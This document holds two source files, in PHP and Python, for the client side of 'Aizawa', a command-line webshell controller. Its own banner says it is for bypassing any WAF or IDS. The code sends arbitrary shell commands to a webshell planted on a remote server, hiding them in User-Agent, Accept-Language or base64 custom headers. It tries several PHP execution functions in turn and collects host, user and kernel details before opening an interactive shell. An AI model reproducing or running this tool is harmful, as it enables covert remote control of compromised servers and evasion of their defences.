File: aizawa.php
<?php
//////////////////////////////////////////////////////
//                                                  //
//                  A I Z A W A                     //
//                                                  //
// Simple command Line webshell by @elliottophellia //
//                                                  //
//////////////////////////////////////////////////////
$bold = "\033[1m";  $red = "\033[31m";
$clear = "\033[0m"; $cyan = "\033[36m";
$blue = "\033[34m"; $purple = "\033[35m";
$green = "\033[32m";$yellow = "\033[33m";
function curl($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    return $ch;
}
function http_user_agent_get($url, $cmd)
{
    $ch = curl($url);
    curl_setopt($ch, CURLOPT_USERAGENT, $cmd);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function http_accept_language_get($url, $cmd)
{
    $ch = curl($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $cmd]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function http_user_agent_post($url, $type, $cmd)
{
    $ch = curl($url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $type);
    curl_setopt($ch, CURLOPT_USERAGENT, $cmd);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function http_accept_language_post($url, $type, $cmd)
{
    $ch = curl($url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $type);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $cmd]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function http_aizawa_ninja($url, $cmd)
{
    $ch = curl($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Aizawa-Ninja: ' . base64_encode((string) $cmd)]);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function execute($url, $cmd, $type)
{
    switch ($type) {

        case "get":
            //
            //  it's kinda weird that if you use curl to get the response code like the post method below
            //  the $httpcode is working fine if you adding query delimiter (?) to the url
            //  something like this:  $queryDelimiter = strpos($url, '?') !== false ? '&' : '?';
            //  but alas, the result still the same, the $httpcode is working fine but the $result is not
            //  but if you init a new curl like this, it's working fine
            //  so i'm just gonna leave it like this
            //  if you have any idea why this is happening, please let me know or just make a pull request
            //
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url . $cmd);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
            $result = curl_exec($ch);
            $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            return [$result, $httpcode];        

        case "post":
            $ch = curl($url);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $cmd);
            $result = curl_exec($ch);
            curl_close($ch);
            return $result;

        case "http_user_agent_get":
            $result = http_user_agent_get($url . "?cmd=system", $cmd);
            switch (true) {
                case empty($result):
                    $result = http_user_agent_get($url . "?cmd=proc_open", $cmd);
                    switch (true) {
                        case empty($result):
                            $result = http_user_agent_get($url . "?cmd=popen", $cmd);
                            switch (true) {
                                case empty($result):
                                    $result = http_user_agent_get($url . "?cmd=passthru", $cmd);
                                    switch (true) {
                                        case empty($result):
                                            $result = http_user_agent_get($url . "?cmd=shell_exec", $cmd);
                                            switch (true) {
                                                case empty($result):
                                                    $result = http_user_agent_get($url . "?cmd=exec", $cmd);
                                                    switch (true) {
                                                        case empty($result):
                                                            $result = $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] . "\n";
                                                            break;
                                                    }
                                                    break;
                                            }
                                            break;
                                    }
                                    break;
                            }
                            break;
                    }
                    break;
            }            
            return $result;

        case "http_accept_language_get":
            $result = http_accept_language_get($url . "?cmd=system", $cmd);
            switch (true) {
                case empty($result):
                    $result = http_accept_language_get($url . "?cmd=proc_open", $cmd);
                    switch (true) {
                        case empty($result):
                            $result = http_accept_language_get($url . "?cmd=popen", $cmd);
                            switch (true) {
                                case empty($result):
                                    $result = http_accept_language_get($url . "?cmd=passthru", $cmd);
                                    switch (true) {
                                        case empty($result):
                                            $result = http_accept_language_get($url . "?cmd=shell_exec", $cmd);
                                            switch (true) {
                                                case empty($result):
                                                    $result = http_accept_language_get($url . "?cmd=exec", $cmd);
                                                    switch (true) {
                                                        case empty($result):
                                                            $result = $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] . "\n";
                                                            break;
                                                    }
                                                    break;
                                            }
                                            break;
                                    }
                                    break;
                            }
                            break;
                    }
                    break;
            }            
            return $result;

        case "http_user_agent_post":
            $result = http_user_agent_post($url, "cmd=system", $cmd);
            switch (true) {
                case empty($result):
                    $result = http_user_agent_post($url, "cmd=proc_open", $cmd);
                    switch (true) {
                        case empty($result):
                            $result = http_user_agent_post($url, "cmd=popen", $cmd);
                            switch (true) {
                                case empty($result):
                                    $result = http_user_agent_post($url, "cmd=passthru", $cmd);
                                    switch (true) {
                                        case empty($result):
                                            $result = http_user_agent_post($url, "cmd=shell_exec", $cmd);
                                            switch (true) {
                                                case empty($result):
                                                    $result = http_user_agent_post($url, "cmd=exec", $cmd);
                                                    switch (true) {
                                                        case empty($result):
                                                            $result = $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] . "\n";
                                                            break;
                                                    }
                                                    break;
                                            }
                                            break;
                                    }
                                    break;
                            }
                            break;
                    }
                    break;
            }            
            return $result;

        case "http_accept_language_post":
            $result = http_accept_language_post($url, "cmd=system", $cmd);
            switch (true) {
                case empty($result):
                    $result = http_accept_language_post($url, "cmd=proc_open", $cmd);
                    switch (true) {
                        case empty($result):
                            $result = http_accept_language_post($url, "cmd=popen", $cmd);
                            switch (true) {
                                case empty($result):
                                    $result = http_accept_language_post($url, "cmd=passthru", $cmd);
                                    switch (true) {
                                        case empty($result):
                                            $result = http_accept_language_post($url, "cmd=shell_exec", $cmd);
                                            switch (true) {
                                                case empty($result):
                                                    $result = http_accept_language_post($url, "cmd=exec", $cmd);
                                                    switch (true) {
                                                        case empty($result):
                                                            $result = $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] . "\n";
                                                            break;
                                                    }
                                                    break;
                                            }
                                            break;
                                    }
                                    break;
                            }
                            break;
                    }
                    break;
            }            
            return $result;

        case "http_aizawa_ninja_eval":
            $result = http_aizawa_ninja($url, "system~" . $cmd);
            switch (true) {
                case empty($result):
                    $result = http_aizawa_ninja($url, "passthru~" . $cmd);
                    switch (true) {
                        case empty($result):
                            $result = http_aizawa_ninja($url, "shell_exec~" . $cmd);
                            switch (true) {
                                case empty($result):
                                    $result = http_aizawa_ninja($url, "exec~" . $cmd);
                                    switch (true) {
                                        case empty($result):
                                            $result = $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] . "\n";
                                            break;
                                    }
                                    break;
                            }
                            break;
                    }
                    break;
            }            
            return $result;

        case "http_aizawa_ninja_concat" || "http_aizawa_ninja_debug" || "http_aizawa_ninja_gc" || "http_aizawa_ninja_json" || "http_aizawa_ninja_filter":
            $result = http_aizawa_ninja($url, $cmd);
            return $result;

        default:
            return null;
    }
}
print "$GLOBALS[yellow]\n   ___   ________  ___ _      _____ \n  / _ | /  _/_  / / _ | | /| / / _ |\n / __ |_/ /  / /_$GLOBALS[blue]/ __ | |/ |/ / __ |\n/_/ |_/___/ /___/_/ |_|__/|__/_/ |_|$GLOBALS[clear]\nA Super Simple Command Line Webshell\nFor Bypassing Any Kind of WAF or IDS\nCode by $GLOBALS[bold]@$GLOBALS[red]elliottophellia$GLOBALS[clear]    $GLOBALS[bold]#$GLOBALS[red]V$GLOBALS[purple]S$GLOBALS[blue]P$GLOBALS[yellow]O$GLOBALS[clear]Fan\n";
$url = $argv[1] ?? readline("Webshell URL: ");
switch (filter_var($url, FILTER_VALIDATE_URL)) {
    case false:
        print "\n$GLOBALS[bold]$GLOBALS[yellow]WARNING!$GLOBALS[clear]\n$GLOBALS[red]ERROR$GLOBALS[clear]: Invalid URL format\nThis does not appear to be a valid URL/IP address\nPlease check the URL and try again\n\nNOTE: localhost/127.0.0.1 is not supported\n\n";
        exit;
}

$remove_cmd = preg_match('/^.*(?:\.)[a-zA-Z]+/m', $url, $matches);
$url = $matches[0];
switch (execute($url, '', 'get')[1]) {
    case 200:
        break;
        
    default:
        print "\n$GLOBALS[bold]$GLOBALS[yellow]WARNING!$GLOBALS[clear]\n$GLOBALS[red]ERROR$GLOBALS[clear]: Invalid HTTP response\nHTTP response code is not 200, please check the URL and try again\n\nNOTE: Aizawa Ninja Edition sometimes returns with HTTP code 500\n\n";
        exit;
}

$filename = substr($url, strrpos($url, '/') + 1);
$hua = preg_match('/get_aizawa_hua_(.*)\./', $filename, $hua);
$hal = preg_match('/get_aizawa_hal_(.*)\./', $filename, $hal);
$hua1 = preg_match('/post_aizawa_hua_(.*)\./', $filename, $hua1);
$hal1 = preg_match('/post_aizawa_hal_(.*)\./', $filename, $hal1);
$ninja1 = preg_match('/aizawa_ninja_eval(.*)\./', $filename, $ninja1);
$ninja2 = preg_match('/aizawa_ninja_concat(.*)\./', $filename, $ninja2);
$ninja3 = preg_match('/aizawa_ninja_debug(.*)\./', $filename, $ninja3);
$ninja4 = preg_match('/aizawa_ninja_gc(.*)\./', $filename, $ninja4);
$ninja5 = preg_match('/aizawa_ninja_json(.*)\./', $filename, $ninja5);
$ninja6 = preg_match('/aizawa_ninja_filter(.*)\./', $filename, $ninja6);
switch (true) {
    case $hua:
        $type = "http_user_agent_get";
        break;
        
    case $hal:
        $type = "http_accept_language_get";
        break;
        
    case $hua1:
        $type = "http_user_agent_post";
        break;
        
    case $hal1:
        $type = "http_accept_language_post";
        break;
        
    case $ninja1:
        $type = "http_aizawa_ninja_eval";
        break;
    
    case $ninja2:
        $type = "http_aizawa_ninja_concat";
        break;

    case $ninja3:
        $type = "http_aizawa_ninja_debug";
        break;

    case $ninja4:
        $type = "http_aizawa_ninja_gc";
        break;

    case $ninja5:
        $type = "http_aizawa_ninja_json";
        break;

    case $ninja6:
        $type = "http_aizawa_ninja_filter";
        break;
        
    default:
        print "\n$GLOBALS[bold]$GLOBALS[yellow]WARNING!$GLOBALS[clear]\n$GLOBALS[red]ERROR$GLOBALS[clear]: Invalid Aizawa webshell\nThis does not appear to be a valid Aizawa webshell\nPlease check the URL and don't change the filename\n\nNOTE: you can change the file extension to bypass WAF but don't change the filename\n\n";
        exit;
}
$user = execute($url, "whoami", $type);
$user = preg_replace('/\s+/', '', (string) $user);
$user = empty($user) ? "aizawaema" : ($user === "ERROR" ? "aizawaema" : $user);
$hostname = execute($url, "hostname", $type);
$hostname = preg_replace('/\s+/', '', (string) $hostname);
$hostname = empty($hostname) ? "virtualesport" : ($hostname === "ERROR" ? "virtualesport" : $hostname);
switch (true) {
    case $ninja1 || $ninja2 || $ninja3 || $ninja4 || $ninja5 || $ninja6:
        print "\n$GLOBALS[green]Successfully connected to Aizawa Webshell Ninja Edition!$GLOBALS[clear]\n\n";
        break;
    default:
        switch (true) {
            case $hua1 || $hal1:
                $disablefunc = execute($url, "disable_functions", "post");
                $safemode = execute($url, "safe_mode", "post");
                $kernel = execute($url, "unamea", "post");
                $server = execute($url, "server", "post");
                $sip = execute($url, "server_ip", "post");
                $cip = execute($url, "client_ip", "post");
                break;

            default:
                $disablefunc = execute($url, "?disable_functions", "get")[0];
                $safemode = execute($url, "?safe_mode", "get")[0];
                $kernel = execute($url, "?unamea", "get")[0];
                $server = execute($url, "?server", "get")[0];
                $sip = execute($url, "?server_ip", "get")[0];
                $cip = execute($url, "?client_ip", "get")[0];
                break;
        }
        $disablefunc = empty($disablefunc) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : ($disablefunc == "NONE" ? $GLOBALS["green"] . $disablefunc . $GLOBALS["clear"] : $GLOBALS["red"] . $disablefunc . $GLOBALS["clear"]);
        $safemode = empty($safemode) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : ($safemode == "ON" ? $GLOBALS["red"] . $safemode . $GLOBALS["clear"] : $GLOBALS["green"] . $safemode . $GLOBALS["clear"]);
        $kernel = empty($kernel) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : $GLOBALS["green"] . $kernel . $GLOBALS["clear"];
        $server = empty($server) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : $GLOBALS["green"] . $server . $GLOBALS["clear"];
        $sip = empty($sip) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : $GLOBALS["green"] . $sip . $GLOBALS["clear"];
        $cip = empty($cip) ? $GLOBALS["red"] . "ERROR" . $GLOBALS["clear"] : $GLOBALS["green"] . $cip . $GLOBALS["clear"];        
        print "\nKernel       :  $kernel\nServer       :  $server\nSafe Mode    :  $safemode\nServer IP    :  $sip\nClient IP    :  $cip\nDisable Func :  $disablefunc\n\n";
    break;
}
do {
    $cmd = readline($GLOBALS["yellow"] . $user . $GLOBALS["clear"] . "@" . $GLOBALS["blue"] . $hostname . $GLOBALS["clear"] . ":~" . $GLOBALS["bold"] . "$ " . $GLOBALS["clear"]);
    readline_add_history($cmd);
    switch ($cmd) {
        case 'exit':
            break;
        default:
            print "\n" . $GLOBALS["cyan"] . execute($url, $cmd, $type) . $GLOBALS["clear"] . "\n";
    }
} while ($cmd != 'exit');

File: aizawa.py
#!/usr/bin/env python
######################################################
##                                                  ##
##                  A I Z A W A                     ##
##                                                  ##
## Simple command Line webshell by @elliottophellia ##
##                                                  ##
######################################################

# Imports


import re
import sys
import httpx
import base64
import asyncio
import validators


# Colors


RED = "\033[31m"
BOLD = "\033[1m"
CYAN = "\033[36m"
BLUE = "\033[34m"
CLEAR = "\033[0m"
GREEN = "\033[32m"
PURPLE = "\033[35m"
YELLOW = "\033[33m"


# Functions


async def http_request(client, method, url, headers=None, data=None):
    headers = headers or {}
    try:
        if method.lower() == "post":
            r = await client.post(url, headers=headers, data={"cmd": data})
        elif method.lower() == "get":
            r = await client.get(url, headers=headers)
        else:
            raise ValueError(
                f"{BOLD} {YELLOW} WARNING! {CLEAR}\n{RED}ERROR {CLEAR}: Invalid method {method}\n"
            )
        r.raise_for_status()
    except httpx.HTTPStatusError as e:
        print(
            f"{BOLD} {YELLOW} WARNING! {CLEAR}\n{RED}ERROR {CLEAR}: Error response {e.response.status_code} while making {method} request to {url}"
        )
        return None
    return r.text


def create_headers(user_agent=None, accept_language=None):
    headers = {
        "sec-ch-ua": 'Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": "Windows",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": user_agent or "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": accept_language or "en-US,en;q=0.9",
    }
    return headers


async def http_user_agent_get(client, url, cmd):
    headers = create_headers(cmd, None)
    return await http_request(client, "get", url, headers)


async def http_accept_language_get(client, url, cmd):
    headers = create_headers(None, cmd)
    return await http_request(client, "get", url, headers)


async def http_user_agent_post(client, url, data, cmd):
    headers = create_headers(cmd, None)
    return await http_request(client, "post", url, headers, data)


async def http_accept_language_post(client, url, data, cmd):
    headers = create_headers(None, cmd)
    return await http_request(client, "post", url, headers, data)


async def http_aizawa_ninja(client, url, cmd):
    headers = create_headers()
    headers["Aizawa-Ninja"] = base64.b64encode(cmd.encode("utf-8"))
    return await http_request(client, "get", url, headers)


async def execute_http_request_get(client, url, cmd, method, request_func):
    result = await request_func(client, url + method, cmd)
    if result:
        return result
    return None


async def execute_http_request_post(client, url, cmd, method, request_func):
    result = await request_func(client, url, method, cmd)
    if result:
        return result
    return None


async def execute(client, url, cmd, type):
    if type == "ping":
        try:
            headers = create_headers()
            r = await client.get(url, headers=headers, follow_redirects=True)
            if r.status_code != 200:
                sys.exit(
                print(
                    BOLD
                    + YELLOW
                    + "WARNING!"
                    + CLEAR
                    + "\n"
                    + RED
                    + "ERROR"
                    + CLEAR
                    + ": Invalid HTTP response code\n"
                    + "Please check the URL and try again\n"
                ))
        except httpx.RequestError as e:
            sys.exit(
            print(
                BOLD
                + YELLOW
                + "WARNING!"
                + CLEAR
                + "\n"
                + RED
                + "ERROR"
                + CLEAR
                + ": URL is not reachable\n"
                + "Please check the URL and try again\n"
            ))

    if type in ["get", "post"]:
        headers = create_headers()
        if type == "get":
            r = await http_request(client, "get", url + cmd, headers)
            if r:
                return r
            return RED + "ERROR" + CLEAR
        elif type == "post":
            r = await client.post(url, headers=headers, data=cmd)
            if r.text:
                return r.text
            return RED + "ERROR" + CLEAR

    if type in [
        "http_aizawa_ninja_eval",
        "http_aizawa_ninja_concat",
        "http_aizawa_ninja_debug",
        "http_aizawa_ninja_gc",
        "http_aizawa_ninja_json",
        "http_aizawa_ninja_filter",
    ]:
        methods = ["system~", "passthru~", "shell_exec~", "exec~"]
        if type == "http_aizawa_ninja_eval":
            for method in methods:
                result = await http_aizawa_ninja(client, url, method + cmd)
                if result:
                    return result
            return RED + "ERROR" + CLEAR
        else:
            result = await http_aizawa_ninja(client, url, cmd)
            if result:
                return result
            return RED + "ERROR" + CLEAR

    if type in ["http_accept_language_get", "http_user_agent_get"]:
        methods = [
            "?cmd=system",
            "?cmd=proc_open",
            "?cmd=popen",
            "?cmd=passthru",
            "?cmd=shell_exec",
            "?cmd=exec",
        ]
        request_func = (
            http_accept_language_get
            if type == "http_accept_language_get"
            else http_user_agent_get
        )
        for method in methods:
            result = await execute_http_request_get(
                client, url, cmd, method, request_func
            )
            if result:
                return result
        return RED + "ERROR" + CLEAR

    if type in ["http_accept_language_post", "http_user_agent_post"]:
        methods = ["system", "proc_open", "popen", "passthru", "shell_exec", "exec"]
        request_func = (
            http_accept_language_post
            if type == "http_accept_language_post"
            else http_user_agent_post
        )
        for method in methods:
            result = await execute_http_request_post(
                client, url, cmd, method, request_func
            )
            if result:
                return result
        return RED + "ERROR" + CLEAR


def banner():
    banner_text = YELLOW + "\n   ___   ________  ___ _      _____ \n"
    banner_text += "  / _ | /  _/_  / / _ | | /| / / _ |\n"
    banner_text += " / __ |_/ /  / /_" + BLUE + "/ __ | |/ |/ / __ |\n"
    banner_text += "/_/ |_/___/ /___/_/ |_|__/|__/_/ |_|" + CLEAR + "\n"
    banner_text += "A Super Simple Command Line Webshell\nFor Bypassing Any Kind of WAF or IDS\n"
    banner_text += "Code by " + BOLD + "   @" + RED + "elliottophellia" + CLEAR + "    "
    banner_text += BOLD + "#" + RED + "V" + PURPLE + "S" + BLUE + "P" + YELLOW + "O" + CLEAR + "\n"
    print(banner_text)


async def main():
    # Httpx Client

    async with httpx.AsyncClient(verify=False, http2=True, timeout=None) as client:
        # Get URL and check if valid

        url = sys.argv[1] if len(sys.argv) > 1 else input("Webshell URL: ")
        if not validators.url(url):
            sys.exit(
            print(
                BOLD
                + YELLOW
                + "WARNING!"
                + CLEAR
                + "\n"
                + RED
                + "ERROR"
                + CLEAR
                + ": Invalid URL format\n"
                + "This does not appear to be a valid URL/IP address\n"
                + "Please check the input and try again\n"
            ))

        # Remove any characters after the file extension

        regex = re.compile(r"^.*\.[a-zA-Z]+", re.MULTILINE)
        remove_char = regex.findall(url)
        url = remove_char[0]

        # Check if URL is alive and reachable

        await execute(client, url, "", "ping")

        # Get filename and strip the domain

        filename = url[url.rfind("/") + 1 :]

        # Classify the webshell type based on the filename

        patterns_to_types = {
            r"get_aizawa_hal_(.*?)\.": "http_accept_language_get",
            r"get_aizawa_hua_(.*?)\.": "http_user_agent_get",
            r"post_aizawa_hal_(.*?)\.": "http_accept_language_post",
            r"post_aizawa_hua_(.*?)\.": "http_user_agent_post",
            r"aizawa_ninja_eval_(.*?)\.": "http_aizawa_ninja_eval",
            r"aizawa_ninja_concat_(.*?)\.": "http_aizawa_ninja_concat",
            r"aizawa_ninja_debug_(.*?)\.": "http_aizawa_ninja_debug",
            r"aizawa_ninja_gc_(.*?)\.": "http_aizawa_ninja_gc",
            r"aizawa_ninja_json_(.*?)\.": "http_aizawa_ninja_json",
            r"aizawa_ninja_filter_(.*?)\.": "http_aizawa_ninja_filter",
        }

        type = None

        for pattern, t in patterns_to_types.items():
            match = re.findall(pattern, filename)
            if match:
                type = t
                break

        if type is None:
            sys.exit(
            print(
                BOLD
                + YELLOW
                + "WARNING!"
                + CLEAR
                + "\n"
                + RED
                + "ERROR"
                + CLEAR
                + ": Invalid filename\n"
                + "This does not appear to be a valid Aizawa Webshell\n"
                + "Please check the URL and try again\n"
            ))

        # Get essential information

        # Get user and host

        user = await execute(client, url, "whoami", type)
        host = await execute(client, url, "hostname", type)
        pwd = await execute(client, url, "pwd", type)

        # Return default values if not found or error

        user = (
            "aizawaema"
            if not user or user == "\033[31mERROR\033[0m"
            else re.sub(r"\s+", "", user)
        )
        host = (
            "virtualesport"
            if not host or host == "\033[31mERROR\033[0m"
            else re.sub(r"\s+", "", host)
        )
        pwd = (
            "~/unknown/path"
            if not pwd or pwd == "\033[31mERROR\033[0m"
            else re.sub(r"\s+", "", pwd)
        )

        # Print essential information
        if type in [
            "http_aizawa_ninja_concat",
            "http_aizawa_ninja_debug",
            "http_aizawa_ninja_gc",
            "http_aizawa_ninja_json",
            "http_aizawa_ninja_filter",
            "http_aizawa_ninja_eval",
        ]:
            print(
                BOLD
                + GREEN
                + "Successfully connected to Aizawa Webshell Ninja Edition!"
                + CLEAR
            )
        else:
            print(
                BOLD
                + GREEN
                + "Successfully connected to Aizawa Webshell!"
                + CLEAR
                + "\n"
            )

            info_commands = {
                "Kernel": "unamea",
                "Server": "server",
                "Safe Mode": "safe_mode",
                "Server IP": "server_ip",
                "Client IP": "client_ip",
                "Disable Function": "disable_functions",
            }

            if type in ["http_accept_language_post", "http_user_agent_post"]:
                method = "post"
            elif type in ["http_accept_language_get", "http_user_agent_get"]:
                method = "get"

            # Calculate the maximum label width
            max_label_width = max(len(label) for label in info_commands.keys())

            for info, command in info_commands.items():
                if method == "get":
                    result = await execute(client, url, f"?{command}", method)
                elif method == "post":
                    result = await execute(client, url, f"{command}", method)
                formatted_info = f"{info.ljust(max_label_width)} : {result}"
                print(f"{BOLD}{formatted_info}{CLEAR}")

        # Initialize the shell

        while True:
            # Get command from user

            cmd = input(
                "\n"
                + BOLD
                + YELLOW
                + user
                + CLEAR
                + "@"
                + BOLD
                + BLUE
                + host
                + CLEAR
                + " "
                + PURPLE
                + pwd
                + CLEAR
                + " % "
            )
            if cmd == "exit" or cmd == "quit" or cmd == "\x03":
                sys.exit(print(BOLD + RED + "Exiting..." + CLEAR))
            if not cmd:
                continue

            # Execute command and print result

            print("\n" + CYAN + await execute(client, url, cmd, type) + CLEAR)


if __name__ == "__main__":
    # Print banner
    banner()

    # Run the script
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print("\n" + BOLD + RED + "Ctrl + C detected. Exiting..." + CLEAR)
